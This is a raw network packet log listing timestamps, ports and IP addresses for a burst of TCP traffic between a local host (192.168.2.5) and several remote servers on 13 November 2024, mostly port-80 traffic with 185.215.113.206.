Nov 13, 2024 20:39:52.519191980 CET	443	49986	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.519448042 CET	49986	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.519582987 CET	49986	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.519597054 CET	443	49986	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.539931059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.539972067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.539983988 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.539983988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.540007114 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.540031910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.540051937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.540064096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.540075064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.540087938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.540096998 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.540101051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.540123940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.540146112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.541884899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.541938066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.541943073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.541954041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.541971922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.541984081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.541984081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542010069 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542105913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542148113 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542171955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542182922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542195082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542207003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542217016 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542221069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542232037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542243004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542244911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542259932 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542259932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542272091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542275906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542284012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542300940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542308092 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542325974 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542330980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542349100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542375088 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542422056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542433023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542455912 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542468071 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542475939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542486906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542521954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542557001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542568922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542579889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542592049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542597055 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542604923 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542614937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542620897 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542633057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542637110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542646885 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542658091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542663097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542670012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542676926 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542684078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542692900 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542709112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542721987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542721987 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542735100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542746067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542754889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542768002 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542781115 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542893887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542927027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542953968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542964935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.542984009 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542998075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.542999029 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543010950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543023109 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543030977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543056965 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543080091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543093920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543104887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543117046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543138027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543164968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543190002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543206930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543219090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543226957 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543231010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543245077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543247938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543255091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543258905 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543267012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543288946 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543319941 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543452024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543467045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543478966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543489933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543494940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543505907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543509007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543518066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543529034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543531895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543540955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543546915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543550968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543560028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543564081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543579102 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543581963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543591976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543593884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543606997 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543610096 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543617964 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543628931 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543631077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543642044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543648958 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543657064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543662071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543670893 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543675900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543684006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543694973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543699026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543706894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543714046 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543720007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543728113 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543731928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543742895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543746948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543757915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543759108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543773890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543775082 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543787956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543811083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543817043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543827057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543853998 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543860912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543873072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543879032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543899059 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543921947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.543962002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543972969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543984890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.543993950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544008017 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544022083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544418097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544444084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544452906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544455051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544488907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544558048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544569016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544579029 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544600964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544615030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544717073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544728041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544739962 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544751883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544753075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544764996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544771910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544775963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544787884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544799089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.544805050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544821024 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.544841051 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.545222998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.545233965 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.545267105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.545355082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.545386076 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.545391083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.545403004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.545424938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.545438051 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.546363115 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.546430111 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.546458960 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.546463966 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.546487093 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.546503067 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.574604988 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.574637890 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.574749947 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.574749947 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.574759007 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.574796915 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.585297108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.585314989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.585354090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.585374117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.588963985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.588977098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.588989019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.589009047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.589030027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.606837034 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.606867075 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.606950998 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.606956959 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.607646942 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.607675076 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.607722044 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.632230997 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.632252932 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.632283926 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.632291079 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.632328987 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.656696081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656737089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656754017 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656764030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.656765938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656780005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656788111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.656801939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.656830072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.656899929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656940937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.656950951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656961918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.656980991 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.656996012 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659127951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659147024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659157991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659185886 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659204006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659286976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659302950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659323931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659323931 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659337044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659351110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659351110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659362078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659370899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659375906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659388065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659398079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659401894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659411907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659414053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659423113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659436941 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659456015 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659852028 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659862995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659874916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659893036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659910917 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659928083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659940004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659950972 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659964085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.659969091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.659985065 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660010099 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660039902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660049915 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660062075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660073996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660079956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660088062 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660109043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660125017 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660269976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660281897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660294056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660305023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660307884 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660316944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660321951 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660329103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660339117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660341978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660353899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660366058 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660366058 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660379887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660386086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660393000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660401106 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660406113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660418987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660425901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660453081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660597086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660608053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660619974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660630941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660644054 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660655022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660665989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660670996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660677910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660685062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660691023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660702944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660710096 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660742044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660743952 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660753965 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660764933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660784960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660795927 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660799026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660809040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660819054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660823107 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660831928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660842896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660845041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660849094 CET	80	49873	185.215.113.206	192.168.2.5
